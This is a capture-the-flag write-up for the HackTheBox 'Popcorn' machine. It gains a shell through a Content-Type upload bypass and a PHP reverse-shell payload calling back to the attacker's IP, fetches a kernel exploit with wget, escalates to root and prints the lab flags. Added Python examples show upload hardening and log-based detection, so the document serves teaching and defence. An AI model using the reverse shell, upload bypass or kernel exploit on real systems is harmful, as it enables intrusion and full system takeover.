HackTheBox Popcorn
Writeup for HackTheBox Popcorn
Machine Synopsis
Key Exploitation Techniques:
- Web File Upload Vulnerability (Content-Type bypass)
- Linux Kernel Privilege Escalation (full-nelson - CVE-2012-0056)
Enumeration
$ nmap -sC -sV -A 10.10.10.6
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
|_ 2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
80/tcp open http Apache httpd 2.2.12 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.12 (Ubuntu)
gobuster revealed a /torrent directory and a user registration/login feature.
$ gobuster dir -u http://10.10.10.6 -k -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
...
/index (Status: 200) [Size: 177]
/test (Status: 200) [Size: 47032]
/torrent (Status: 301) [Size: 310] [--> http://10.10.10.6/torrent/]
/rename (Status: 301) [Size: 309] [--> http://10.10.10.6/rename/]
...
Exploitation
Initial Access (www-data)
After creating and logging into a new account, an upload page was accessible. Initial attempts to upload a PHP reverse shell were met with a “This is not a valid torrent file” error.
A valid torrent file was uploaded, revealing an option to “change screenshot.”
Attempting to upload a PHP reverse shell as a screenshot resulted in an “invalid file” error. This suggested a client-side or server-side file type check based on extension or initial magic bytes.
The upload request was intercepted, and its Content-Type header was changed from application/x-php to image/png. This bypassed the file type validation, allowing the PHP shell to be uploaded.
# Modified HTTP Request
...
Content-Type: image/png
<?php system("bash -i >& /dev/tcp/10.10.14.9/1234 <&1"); ?>
The server response confirmed the successful upload.
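The bypass above works because the application derives the file type from the client-supplied Content-Type header. As an added defensive example (not code from the writeup or from the Popcorn application), the Python below contrasts a check that trusts that header, which the modified request slips past, with one that decides from the extension and the file's magic bytes and then stores the file under a server-chosen name. The 2 MiB size cap, the PNG-only policy and the sample inputs are assumptions for the example.

```python
import os
import secrets
from typing import Tuple

# Signature bytes of the image type the "change screenshot" feature expects.
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
ALLOWED_EXTENSIONS = {".png"}
ALLOWED_CONTENT_TYPES = {"image/png"}
MAX_SIZE = 2 * 1024 * 1024  # assumed 2 MiB cap for a screenshot


def weak_check(filename: str, content_type: str, data: bytes) -> bool:
    """Validation that trusts the Content-Type header. The header is chosen
    by the client, so rewriting application/x-php to image/png is enough."""
    return content_type in ALLOWED_CONTENT_TYPES


def hardened_check(filename: str, content_type: str, data: bytes) -> Tuple[bool, str]:
    """Validation that derives the type from the bytes and the extension and
    treats Content-Type only as a hint. Returns (accepted, reason)."""
    ext = os.path.splitext(filename)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        return False, f"extension {ext!r} not allowed"
    if len(data) > MAX_SIZE:
        return False, "file too large"
    if not data.startswith(PNG_MAGIC):
        return False, "content is not a PNG (magic bytes mismatch)"
    if content_type not in ALLOWED_CONTENT_TYPES:
        # A mismatch is not a reason to reject a real PNG, but it is worth logging.
        return True, "accepted; Content-Type header disagreed with content"
    return True, "accepted"


def safe_storage_name(original_name: str) -> str:
    """Random server-chosen name with a fixed extension, so the stored file never
    carries the attacker-supplied name or a script extension. The original name
    is deliberately ignored."""
    return secrets.token_hex(16) + ".png"


# Constructed inputs mirroring the writeup's request: a PHP body sent with a
# spoofed image/png Content-Type, and a genuine minimal PNG header.
SPOOFED_UPLOAD = ("exploit.php", "image/png", b"<?php echo 'not a png'; ?>")
REAL_PNG = ("shot.png", "image/png", PNG_MAGIC + b"\x00" * 64)

if __name__ == "__main__":
    for name, ctype, body in (SPOOFED_UPLOAD, REAL_PNG):
        print(name, "weak:", weak_check(name, ctype, body),
              "hardened:", hardened_check(name, ctype, body),
              "stored as:", safe_storage_name(name))
```

The magic-bytes check alone is not sufficient, since a PHP payload can follow a valid PNG header; what actually removes the risk is the server-chosen name with a non-executable extension combined with an upload directory where the web server has script execution disabled.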
A netcat listener was set up. The reverse shell was triggered by accessing the uploaded file (e.g., http://10.10.10.6/torrent/upload/exploit.php).
# Attacker machine: Netcat listener
$ nc -nlvp 1234
listening on [any] 1234 ...
A www-data shell was obtained.
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.6] 34129
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ uname -r
2.6.31-14-generic-pae
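From the defender's side, the request that triggered the shell leaves a distinctive trace: a script extension being served from a directory that should only hold uploaded data files. As an added example (not part of the writeup), the Python below parses Apache combined-log lines of the kind the Apache 2.2 seen in the scan would write and flags any request for a script under /torrent/upload/. The log lines, the timestamps and the list of extensions are constructed for the example.

```python
import re
from typing import Dict, Iterable, List, Optional

# Apache combined/common log format: client, identity, user, timestamp,
# request line, status, response size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Directories that should only ever contain user-uploaded data files.
UPLOAD_DIRS = ("/torrent/upload/",)
# Extensions that mod_php would execute if such a file were served from there.
SCRIPT_EXTENSIONS = (".php", ".phtml", ".php3", ".php4", ".php5", ".phar")


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Return the fields of one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_script_hits(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Flag requests whose path points at a script inside an upload directory.
    The query string is stripped and the path lower-cased before matching so
    that Exploit.PHP?x=1 is caught as well."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0].lower()
        if path.startswith(UPLOAD_DIRS) and path.endswith(SCRIPT_EXTENSIONS):
            hits.append(rec)
    return hits


# Constructed sample log: a normal page view, a legitimate screenshot fetch,
# and the request that would trigger an uploaded PHP file.
SAMPLE_LOG = [
    '10.10.14.9 - - [01/Jan/2024:12:00:01 +0000] "GET /torrent/ HTTP/1.1" 200 4120',
    '10.10.14.9 - - [01/Jan/2024:12:00:15 +0000] "GET /torrent/upload/abc123.png HTTP/1.1" 200 8192',
    '10.10.14.9 - - [01/Jan/2024:12:00:30 +0000] "GET /torrent/upload/exploit.php HTTP/1.1" 200 0',
    'garbage line that does not parse',
]

if __name__ == "__main__":
    for hit in find_script_hits(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} {hit['method']} {hit['path']} -> {hit['status']}")
```

A hit with status 200 means the server actually executed or served the script; a 404 on the same pattern is still worth alerting on, since it shows someone probing for an uploaded file. Pairing this with a web-server rule that disables PHP execution in the upload directory turns the alert into a non-event.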
Privilege Escalation
Linux Kernel Exploit
The kernel version 2.6.31-14-generic-pae was identified. Linux Exploit Suggester (les.sh) was used to find applicable local privilege escalation exploits.
$ wget http://10.10.14.9:8000/les.sh
$ chmod +x les.sh
$ ./les.sh
...
Possible Exploits:
cat: write error: Broken pipe
[+] [CVE-2012-0056,CVE-2010-3849,CVE-2010-3850] full-nelson
Details: http://vulnfactory.org/exploits/full-nelson.c
Exposure: highly probable
Tags: [ ubuntu=(9.10|10.10){kernel:2.6.(31|35)-(14|19)-(server|generic)} ],ubuntu=10.04{kernel:2.6.32-(21|24)-server}
Download URL: http://vulnfactory.org/exploits/full-nelson.c
...
The full-nelson.c exploit was downloaded, compiled, and executed on the target.
$ wget http://10.10.14.9:8000/full-nelson.c
$ gcc full-nelson.c -o full-nelson
$ chmod +x full-nelson
$ ./full-nelson
Execution of full-nelson yielded a root shell.
id
uid=0(root) gid=0(root)
cd /home/george
cat user.txt
c1b9db61d386e3f830c010480ab54077
cd /root
cat root.txt
c5ba80b7f9f478d28cbbf7c59df47478
The user.txt and root.txt flags were retrieved.